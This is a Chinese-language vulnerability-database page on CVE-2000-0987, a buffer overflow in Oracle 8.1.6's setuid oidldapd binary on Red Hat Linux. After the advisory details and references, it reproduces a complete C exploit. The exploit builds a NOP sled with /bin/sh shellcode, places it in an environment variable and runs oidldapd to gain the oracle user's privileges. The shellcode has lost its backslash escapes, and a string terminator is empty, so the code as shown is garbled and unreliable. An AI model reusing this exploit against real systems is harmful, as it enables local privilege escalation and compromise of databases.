Oracle oidldapd存在缓冲区溢出漏洞

Oracle oidldapd存在缓冲区溢出漏洞

漏洞ID 1106046 漏洞类型 缓冲区溢出
发布时间 2000-10-18 更新时间 2000-12-19
图片[1]-Oracle oidldapd存在缓冲区溢出漏洞-安全小百科CVE编号 CVE-2000-0987
图片[2]-Oracle oidldapd存在缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200012-159
漏洞平台 Linux CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/20312
https://www.securityfocus.com/bid/82995
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200012-159
|漏洞详情
Oracle8.1.6版本oidldapd存在缓冲区溢出漏洞。本地用户借助超长”connect”命令行参数提升特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/1828/info

Oracle Internet Directory 2.0.6 is a pre-alpha development release, available as both an addon package and in the Oracle Database Software release 8.1.6. A vulnerability has been found in the oidldap binary within the package.

A buffer overflow exists in the oidldap binary, which is setuid oracle. When executed on the command line, the oidldap binary performs an unsafe check of the ORACLE_HOME environment variable. It is possible for a malicous user to execute shell code through the ORACLE_HOME environment variable, allowing the user to inherit an euid of oracle. In a stock installation of Oracle 8.1.6, this could create a scenario which would allow a local user to compromise the integrity of a database.

/*
Exploit Code for oidldapd in Oracle 8.1.6 (8ir2) for Linux. I tested in RH 6.2
and 6.1. This code is a bullshit (i know please no comments about ;-)).

If someone exports this to Sparc please tell me.

synopsis: buffer overflow in oidldapd
impact:   any user gain euid=oracle.


Dedicated to PlazaSite guys. Klink Klink Team. Panxeta, Entrophy and others.
*/

#include <stdio.h>
#include <stdlib.h>

#define DEFAULT_OFFSET                   13
#define DEFAULT_BUFFER_SIZE             700
#define NOP                            0x90
#define ORACLE_HOME             "/usr/local/oracle/app/oracle/product/8.1.6"

char shellcode[] =
  "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
  "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
  "x80xe8xdcxffxffxff/bin/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr,*name[3],environ[100],binary[120];
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;


  buff = malloc(bsize);
  addr = get_sp() - offset;
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '';

  memcpy(buff,"EGG=",4);
  putenv(buff);
  sprintf(environ,"ORACLE_HOME=%s",ORACLE_HOME);
  putenv(environ);
  sprintf(binary,"%s/bin/oidldapd connect=$EGG",ORACLE_HOME);
  system(binary);
}
|受影响的产品
Oracle Oracle8i Enterprise Edition 8.1.6

Oracle Internet Directory 2.0.6 .0.0

+

Redhat Linux 6.2 i386

+

Redhat Linux 6.1 i386

|参考资料

来源:XF
名称:oracle-oidldap-bo
链接:http://xforce.iss.net/static/5401.php
来源:BUGTRAQ
名称:20001020Inresponsetoposting10/18/2000vulnerabilityinOracleInternetDirectoryinOracle8.1.6
链接:http://www.securityfocus.com/archive/1/140709
来源:BUGTRAQ
名称:20001018vulnerabilityinOracleInternetDirectoryinOracle8.1.6
链接:http://www.securityfocus.com/archive/1/140340

相关推荐: D-Link DI-614+ – IP Fragment Reassembly Denial of Service

D-Link DI-614+ – IP Fragment Reassembly Denial of Service 漏洞ID 1053368 漏洞类型 发布时间 1998-04-16 更新时间 1998-04-16 CVE编号 N/A CNNVD-ID N/A…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享